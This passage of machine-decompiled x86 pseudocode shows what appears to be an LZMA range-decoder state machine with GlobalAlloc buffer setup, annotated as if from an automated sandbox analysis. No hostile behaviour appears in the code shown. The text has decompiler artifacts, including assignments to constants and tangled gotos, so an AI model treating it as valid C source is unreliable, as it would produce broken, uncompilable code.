							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
